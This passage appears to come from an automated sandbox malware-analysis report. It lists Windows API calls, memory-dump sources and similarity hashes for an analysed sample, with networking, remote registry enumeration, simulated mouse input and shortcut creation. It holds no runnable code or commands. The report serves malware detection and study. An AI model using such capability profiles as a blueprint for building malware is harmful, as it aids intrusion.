                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B6284F
                                                                                                                                                                                                                                                                                    • htons.WSOCK32(?,?,?,?,?), ref: 00B62938
                                                                                                                                                                                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 00B628E9
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4433E: _strlen.LIBCMT ref: 00B44348
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B63C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00B5F669), ref: 00B63C9D
                                                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 00B62992
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d069dfb649a26639acb14727958207cf76d79daf6291ff36c811b08d8ded429a
                                                                                                                                                                                                                                                                                    • Instruction ID: 47c24b79282094e4598606e554e67427e568cec9f629ffba646438b37d4c7486
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d069dfb649a26639acb14727958207cf76d79daf6291ff36c811b08d8ded429a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30B1F031604740AFE324DF64C885E2ABBE5EF84318F54859CF45A4B2E2DB75EE42CB91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00B1042A
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B10446
                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00B1045D
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B1047B
                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00B10492
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B104B0
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                    • Instruction ID: 98b33914305f19252abc22d8ec1cbc7bdfe8e7d57bd9564f9a27f47f89918ea8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF81E871610709ABE720BF68DC81BEA73F9EF58320F6441AAF521D7681E7B0D9C08794
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B08649,00B08649,?,?,?,00B167C2,00000001,00000001,8BE85006), ref: 00B165CB
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B167C2,00000001,00000001,8BE85006,?,?,?), ref: 00B16651
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B1674B
                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00B16758
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B13B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B06A79,?,0000015D,?,?,?,?,00B085B0,000000FF,00000000,?,?), ref: 00B13BC5
                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00B16761
                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00B16786
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c4a32ee2b633e06edbf01983b8c24de4b31a0ace5ba936d8c4c9bca88df836bf
                                                                                                                                                                                                                                                                                    • Instruction ID: c0184ff02287e8186650547ef30b6b40c8c0b1d8f1fca4e5c2e360de21430e2f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4a32ee2b633e06edbf01983b8c24de4b31a0ace5ba936d8c4c9bca88df836bf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3651EF72610216AFEB259F64CC85EFB77EAEB40754F9446A9FC18D6180EB34DC90C6A0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B6C10E,?,?), ref: 00B6D415
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D451
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D4C8
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D4FE
                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B6C72A
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B6C785
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00B6C7CA
                                                                                                                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B6C7F9
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B6C853
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00B6C85F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d7b324341e0b131a4b091764efe7a9a7ef7455e97423d1d2d4ff16f9a63fd8d3
                                                                                                                                                                                                                                                                                    • Instruction ID: c564e38ba5d5827a76f4bf8af02ed60cb9eb7992f21803a1095c513d67b0877e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7b324341e0b131a4b091764efe7a9a7ef7455e97423d1d2d4ff16f9a63fd8d3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8819B31208241AFC714DF25C995E3ABBE5FF84308F1489ACF4994B2A2DB35ED45CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(00000035), ref: 00B400A9
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00B40150
                                                                                                                                                                                                                                                                                    • VariantCopy.OLEAUT32(00B40354,00000000), ref: 00B40179
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(00B40354), ref: 00B4019D
                                                                                                                                                                                                                                                                                    • VariantCopy.OLEAUT32(00B40354,00000000), ref: 00B401A1
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B401AB
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 743e2af5a76de2b33cda54d99cf550901a804d18147214d0e3e0c3d8511a9381
                                                                                                                                                                                                                                                                                    • Instruction ID: 6590bea609823be8431a461f580c7cb4a77a2f1442f7d2bd879f17a0e2f24aad
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 743e2af5a76de2b33cda54d99cf550901a804d18147214d0e3e0c3d8511a9381
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E151C731620314AACF20BB64D8C9B29B3F5EF45310F149486FA06EF2D6DBB09D44EB55
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE41EA: _wcslen.LIBCMT ref: 00AE41EF
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE8577: _wcslen.LIBCMT ref: 00AE858A
                                                                                                                                                                                                                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00B59F2A
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B59F4B
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B59F72
                                                                                                                                                                                                                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00B59FCA
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                                    • String ID: X
                                                                                                                                                                                                                                                                                    • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                                    • Opcode ID: c3d0c7171367f57311d16a21e60f3eacc2d30a791412e5b9756fa2c90796fe30
                                                                                                                                                                                                                                                                                    • Instruction ID: 827647b06a68a8ea626b72b9d214b4988c4581e9d5f2d19c6c5a12e3cdde457e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3d0c7171367f57311d16a21e60f3eacc2d30a791412e5b9756fa2c90796fe30
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFE16F31504340DFD714EF25C981B6AB7E4EF84314F0489ADF8999B2A2DB71ED09CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B56F21
                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00B5707E
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00B80CC4,00000000,00000001,00B80B34,?), ref: 00B57095
                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00B57319
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                                                                                                                    • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                    • Opcode ID: aff22dd72f6317dff954a97c645e7ee2f063fccc8cd2863e4d62d3b52456c357
                                                                                                                                                                                                                                                                                    • Instruction ID: e0b2fa4a80fef11d91f45b3a9e36896ea2cd17bf5c2b685f55b70384edc569da
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aff22dd72f6317dff954a97c645e7ee2f063fccc8cd2863e4d62d3b52456c357
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3D14A71608241AFC300EF25C881A6BB7E8EF94744F4449ADF5958B2A2DB71E949CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00AE24B0
                                                                                                                                                                                                                                                                                    • BeginPaint.USER32(?,?,?), ref: 00AE1B35
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00AE1B99
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00AE1BB6
                                                                                                                                                                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AE1BC7
                                                                                                                                                                                                                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 00AE1C15
                                                                                                                                                                                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00B23287
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE1C2D: BeginPath.GDI32(00000000), ref: 00AE1C4B
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3050599898-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1ebfac5d1b3548637f9fce7e7078796cc06d7be999e1bf9415e12b4d386b9fef
                                                                                                                                                                                                                                                                                    • Instruction ID: 06b88a54e849ad8989d876147411a5cb66bf20fa6538fc9fae095c9b2af3a02a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ebfac5d1b3548637f9fce7e7078796cc06d7be999e1bf9415e12b4d386b9fef
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5041CF70104350AFD720DF29DC85FB67BF8EF49724F140669FAA98B2A1CB709944DB62
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B511B3
                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00B511EE
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00B5120A
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00B51283
                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00B5129A
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B512C8
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e6105f25c0ed2ab8f0159dea72f8cd5fc463116d8213efb52f7796f712d056b6
                                                                                                                                                                                                                                                                                    • Instruction ID: 3645243acca2035da54383aa6be58ebf8524dc914629b33c59699d41db61c80b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6105f25c0ed2ab8f0159dea72f8cd5fc463116d8213efb52f7796f712d056b6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C415671900205ABDF04AF58DC85BAABBB8EF04300F1084E5EE04AB296DB30DE55DBA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00B3FBEF,00000000,?,?,00000000,?,00B239E2,00000004,00000000,00000000), ref: 00B78CA7
                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00B78CCD
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00B78D2C
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00B78D40
                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00B78D66
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00B78D8A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3a4268ef28c436b223a46f7fbdb299d1b1f4248ac6c8f3312fe0811690381ddc
                                                                                                                                                                                                                                                                                    • Instruction ID: 332ec5972cd591a3dfa069c4bca497e183db3f276f84b23665015b953c222bec
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a4268ef28c436b223a46f7fbdb299d1b1f4248ac6c8f3312fe0811690381ddc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D41DF30642244AFDB26CF24C98DBA17BF1FF45314F1881F9E56D5B2A2CB71A846CB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 00B62D45
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B5EF33: GetWindowRect.USER32(?,?), ref: 00B5EF4B
                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00B62D6F
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00B62D76
                                                                                                                                                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00B62DB2
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00B62DDE
                                                                                                                                                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B62E3C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8aeabb7a1823a17ed2da41221fbf133d6effa521abfdb8e4e10ee2b8d36e1b80
